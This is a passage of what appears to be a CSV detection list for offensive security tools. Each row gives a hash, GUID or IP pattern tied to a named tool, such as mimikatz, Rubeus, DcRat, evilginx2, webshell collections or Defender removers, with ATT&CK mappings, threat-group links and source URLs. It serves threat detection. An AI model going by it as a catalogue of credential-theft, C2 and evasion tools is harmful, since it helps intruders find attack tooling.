"*66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd*",".{0,1000}66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28130"
"*6698d5497a277c219184b29528e85650b887b7222c36b55ed1d2cf8bda0f57c8*",".{0,1000}6698d5497a277c219184b29528e85650b887b7222c36b55ed1d2cf8bda0f57c8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28131"
"*66AA4619-4D0F-4226-9D96-298870E9BB50*",".{0,1000}66AA4619\-4D0F\-4226\-9D96\-298870E9BB50.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#GUIDproject","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28134"
"*66AA4619-4D0F-4226-9D96-298870E9BB50*",".{0,1000}66AA4619\-4D0F\-4226\-9D96\-298870E9BB50.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#GUIDproject","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28135"
"*66b63cd9f55f90b78592f0b6d9fd5ba8b8b31b538bd20be459f2a380811f4d13*",".{0,1000}66b63cd9f55f90b78592f0b6d9fd5ba8b8b31b538bd20be459f2a380811f4d13.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28138"
"*66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162*",".{0,1000}66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","28139"
"*66c22a683d5db931524f36f878f343210a43c78b5f09aa2b78ba9511ea76f679*",".{0,1000}66c22a683d5db931524f36f878f343210a43c78b5f09aa2b78ba9511ea76f679.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28140"
"*66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0*",".{0,1000}66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","28141"
"*66cc6913830c3720ead982e9cd43574bb3340d112521e86b4cf3c9edf627f88b*",".{0,1000}66cc6913830c3720ead982e9cd43574bb3340d112521e86b4cf3c9edf627f88b.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28144"
"*66cf5ea7e6e66a06e331c24e6210453c39788f86973a3078dce8324aaee11af8*",".{0,1000}66cf5ea7e6e66a06e331c24e6210453c39788f86973a3078dce8324aaee11af8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28146"
"*66d16546824f6e98b531bfdfe411ba4b837e99362f735ed2dd61ead2aae4ab91*",".{0,1000}66d16546824f6e98b531bfdfe411ba4b837e99362f735ed2dd61ead2aae4ab91.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","28147"
"*66d21568244cc3fda07d6d6c28b0bc683f18f12d4508bbe7be070b9e98989395*",".{0,1000}66d21568244cc3fda07d6d6c28b0bc683f18f12d4508bbe7be070b9e98989395.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28148"
"*66d6387cef13f58ab746d452dc68e0f3e71d509a50a4f7518490fbf0cc16e3d4*",".{0,1000}66d6387cef13f58ab746d452dc68e0f3e71d509a50a4f7518490fbf0cc16e3d4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28149"
"*66e0681a500c726ed52e5ea9423d2654*",".{0,1000}66e0681a500c726ed52e5ea9423d2654.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","28150"
"*66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc*",".{0,1000}66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28153"
"*67.171.34.23*",".{0,1000}67\.171\.34\.23.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","#ipaddress","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","28155"
"*67086ee2d7fc1c67e2aa1f341b6c692b711fe890c419b9e3b7a80c727163db64*",".{0,1000}67086ee2d7fc1c67e2aa1f341b6c692b711fe890c419b9e3b7a80c727163db64.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28157"
"*670b7828e25e5f8f015e74468836762e764a4e345d851ed656715eeae70cdbec*",".{0,1000}670b7828e25e5f8f015e74468836762e764a4e345d851ed656715eeae70cdbec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28158"
"*6727e1988ae996df818696de98826a6dcf0e0fc3dd7e32cf9247b41fa225b856*",".{0,1000}6727e1988ae996df818696de98826a6dcf0e0fc3dd7e32cf9247b41fa225b856.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","28163"
"*6743328a2adebc279e702b4fbfc978b8689dbe9313a157b3cbffafd3a77b610e*",".{0,1000}6743328a2adebc279e702b4fbfc978b8689dbe9313a157b3cbffafd3a77b610e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28168"
"*6746881860057860fe384c046a89cdf6f5e3bbd014793b6e0d029f160b4119cf*",".{0,1000}6746881860057860fe384c046a89cdf6f5e3bbd014793b6e0d029f160b4119cf.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","28169"
"*674ca493a5e0a62ec5190a54861a065b3b3a15e59fe74e4012590f97329490c0*",".{0,1000}674ca493a5e0a62ec5190a54861a065b3b3a15e59fe74e4012590f97329490c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28170"
"*6752dd08be06b124a3e1865645b5b1a6b4f8765ac8fc3fa002bd39ec448e4ba2*",".{0,1000}6752dd08be06b124a3e1865645b5b1a6b4f8765ac8fc3fa002bd39ec448e4ba2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28171"
"*67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72*",".{0,1000}67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28172"
"*6754d8a678534bb60c6d140a76564a2288cc4b03e4c82cbe17d174546178d553*",".{0,1000}6754d8a678534bb60c6d140a76564a2288cc4b03e4c82cbe17d174546178d553.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28173"
"*67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f*",".{0,1000}67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28174"
"*675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6*",".{0,1000}675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28176"
"*675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e*",".{0,1000}675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28177"
"*67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f*",".{0,1000}67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28178"
"*676193b9ffe3b9c725599cb718c9c2f961254e233e00e3c38ad2ccb793051acd*",".{0,1000}676193b9ffe3b9c725599cb718c9c2f961254e233e00e3c38ad2ccb793051acd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28179"
"*676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b*",".{0,1000}676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","#filehash","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","28181"
"*67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb*",".{0,1000}67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28182"
"*676E89F3-4785-477A-BA1C-B30340F598D5*",".{0,1000}676E89F3\-4785\-477A\-BA1C\-B30340F598D5.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","#GUIDproject","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","28183"
"*67780c88b2cac99c7c6cd8fb720136a2617ac4a0e79894cc0a05925d4517db45*",".{0,1000}67780c88b2cac99c7c6cd8fb720136a2617ac4a0e79894cc0a05925d4517db45.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28184"
"*67830961a8dee229b3446833b1c4a2b6228ed3b949ee481ea3681bdb4a5f71c1*",".{0,1000}67830961a8dee229b3446833b1c4a2b6228ed3b949ee481ea3681bdb4a5f71c1.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28185"
"*67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28*",".{0,1000}67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28186"
"*6783b4ec3c93421324cf6b7835994545baf29c5b1341a26a565e57af77ba965a*",".{0,1000}6783b4ec3c93421324cf6b7835994545baf29c5b1341a26a565e57af77ba965a.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28187"
"*6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e*",".{0,1000}6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","28188"
"*678ce24e-70c4-47b1-b595-ca0835ba35d9*",".{0,1000}678ce24e\-70c4\-47b1\-b595\-ca0835ba35d9.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#GUIDproject","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28189"
"*67908b4e774d138792557c430f8ec4f48aa9094b0c639bd57e7f49aacc17788e*",".{0,1000}67908b4e774d138792557c430f8ec4f48aa9094b0c639bd57e7f49aacc17788e.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","28190"
"*6793418c5f683d05f50c73efea706e93ab08b8027c6711cc2f4c8d8dbf91c439*",".{0,1000}6793418c5f683d05f50c73efea706e93ab08b8027c6711cc2f4c8d8dbf91c439.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28191"
"*679703e9859c20ab39d6be992aa7d979710d9ace*",".{0,1000}679703e9859c20ab39d6be992aa7d979710d9ace.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","28193"
"*67a426a646b50409aaaf70383a7f6b4b10981034623b4089a32fabb839997656*",".{0,1000}67a426a646b50409aaaf70383a7f6b4b10981034623b4089a32fabb839997656.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","28194"
"*67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3*",".{0,1000}67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28195"
"*67aa975f27ff2c5b874c62c9665c345e54c9dedecacf8b8439d6e30b86906350*",".{0,1000}67aa975f27ff2c5b874c62c9665c345e54c9dedecacf8b8439d6e30b86906350.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","28196"
"*67bac3b5650c719fbc15dcdb5ccb2dd07414876f6b55baa967342356d80357dd*",".{0,1000}67bac3b5650c719fbc15dcdb5ccb2dd07414876f6b55baa967342356d80357dd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28197"
"*67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287*",".{0,1000}67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28198"
"*67c7d31360028ba45e62e75295a20464fcb99cf1c6469618e8f8b97614cfe950*",".{0,1000}67c7d31360028ba45e62e75295a20464fcb99cf1c6469618e8f8b97614cfe950.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28199"
